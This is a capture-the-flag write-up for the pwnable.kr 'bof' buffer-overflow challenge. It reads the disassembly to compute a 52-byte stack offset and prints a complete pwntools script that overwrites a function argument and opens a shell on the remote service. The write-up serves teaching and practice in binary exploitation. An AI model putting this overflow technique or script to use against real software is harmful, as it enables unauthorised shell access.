bof | pwnable challenge

Hello. This is a writeup for the bof challenge (binary exploitation) on pwnable.kr; the challenge page can be found here.
Let's go.


Solving The Challenge

The challenge gives us 2 files to download: the binary and its C source.


We first run strings on the binary to see whether anything interesting (such as a flag) is embedded in it, and find nothing.
Since we are also given the source code, we read that to see what we can find.


We see it uses gets, a dangerous function that reads a line into a buffer without checking its size, so it cannot prevent a buffer overflow. For more info, run man gets to see how it works (the man page itself says never to use it).
func has a local buffer overflowme that is 32 bytes long, and gets reads into it.
It first prints the prompt overflow me : and then waits for user input.
If key == 0xcafebabe it spawns a shell, otherwise it prints Nah..

We can also look at the functions in Cutter, starting with main:


In main we see the value 0xdeadbeef being stored at [esp]: that is the argument being set up for the call to func, so key starts out as 0xdeadbeef.
We also notice the other function, func.


In func we see the call to gets that we already saw in the source code, with its argument placed at [esp].
Continuing through the function, it loads the address of the buffer into eax, stores eax at [esp] (that is the pointer gets will write to), calls gets, and then compares key, which as the first argument of func lives at ebp+0x8, against 0xcafebabe. If the value is 0xcafebabe we get a shell. In main we saw that key was set to 0xdeadbeef, so we need to overwrite key with 0xcafebabe through the overflow.
Let's try running the binary.


By default it prints Nah.., as expected.
Let's use gdb to find the offset we need.
In func, lea (load effective address) puts the address of var_2ch, i.e. overflowme at ebp-0x2c, into eax, which is then stored at [esp] as the argument of gets. The value compared against 0xcafebabe is key at ebp+0x8. So we need these 2 stack positions for our exploit: the buffer starts at ebp-0x2c and key sits at ebp+0x8, so the distance between them is 0x2c + 0x8 = 52 bytes. Whatever we write after the first 52 bytes lands on key; the saved ebp and return address in between get clobbered too, which is fine here because the comparison and the shell happen before func returns.
Now we can develop our exploit using pwntools:
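The exploit below is an added example written for this writeup, not the original script from the page (which was an image). It computes the 52-byte distance from the stack offsets discussed above, packs 0xcafebabe as a little-endian dword, and delivers the payload either to a local copy of the binary or to the remote service. The names ./bof for the local binary and pwnable.kr:9000 for the remote endpoint are assumptions; pass a different host:port if yours differs.

```python
#!/usr/bin/env python3
"""Exploit for the pwnable.kr bof challenge.

Stack frame of func() as read from the disassembly (32-bit x86, cdecl):

    ebp-0x2c  overflowme[32]   <- gets() writes here with no bound
    ebp+0x0   saved ebp
    ebp+0x4   return address
    ebp+0x8   key              <- cmp [ebp+0x8], 0xcafebabe

From the first byte of the buffer to key is 0x2c + 0x8 = 52 bytes, so the
payload is 52 bytes of filler followed by 0xcafebabe as a little-endian
dword.  The saved ebp, return address and (if the binary has one) the stack
canary in between get clobbered, which does not matter: the comparison and
the shell happen before func() ever returns.

Assumed names: local binary "./bof" and remote endpoint pwnable.kr:9000;
pass another host:port on the command line if the challenge lists a
different one.
"""
import struct
import sys

BUF_OFFSET = 0x2c   # overflowme lives at ebp-0x2c (from `lea eax, [ebp-0x2c]`)
KEY_OFFSET = 0x8    # first argument of a cdecl function is at ebp+0x8
KEY_VALUE = 0xCAFEBABE


def key_distance(buf_offset=BUF_OFFSET, key_offset=KEY_OFFSET):
    """Number of bytes from the first byte of overflowme to the key argument."""
    return buf_offset + key_offset          # 0x2c + 0x8 = 52


def build_payload(value=KEY_VALUE, distance=None, filler=b"A"):
    """Filler up to key, then the wanted key as a little-endian 32-bit value.

    gets() stops at the first newline, so a payload containing 0x0a would be
    cut short before it reaches key; refuse such a payload early.
    """
    if distance is None:
        distance = key_distance()
    payload = filler * distance + struct.pack("<I", value)
    if b"\n" in payload:
        raise ValueError("payload contains a newline; gets() would stop there")
    return payload


def run(target="local"):
    """Deliver the payload and hand the shell over to the user.

    target == "local" runs ./bof with pwntools' process(); any other value is
    taken as host:port of the remote service.
    """
    # pwntools is imported here so the payload helpers above stay usable
    # (and testable) on a machine without it.
    from pwn import process, remote

    payload = build_payload()
    if target == "local":
        io = process("./bof")
        io.recvuntil(b"overflow me : ")
    else:
        host, port = target.rsplit(":", 1)
        io = remote(host, int(port))
        # No recvuntil here: on the remote side stdout is a socket, not a
        # terminal, so the printf()'d prompt stays in the stdio buffer and
        # never arrives before we send input; waiting for it would hang.
    io.sendline(payload)      # sendline appends the '\n' that terminates gets()
    io.interactive()          # read the flag file from the shell


if __name__ == "__main__":
    run(sys.argv[1] if len(sys.argv) > 1 else "local")
```

Run it with no arguments to attack ./bof locally, or with host:port (for example pwnable.kr:9000) to attack the remote service; the only difference between the two paths is the wait for the prompt.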

When we run the exploit locally, we get an interactive shell.
So let's switch it to the remote side.

Note: for the remote side we comment out the recvuntil, otherwise the script hangs. The prompt is written by printf without a newline, and because the remote process's stdout is a socket rather than a terminal it is fully buffered, so the prompt never reaches us before we send our input. Without that wait it runs fine and we get the flag.

On running the exploit against the remote service we land in a shell.

We can now read the flag file to get our flag.

That's it, the end of an exciting binary exploitation challenge.
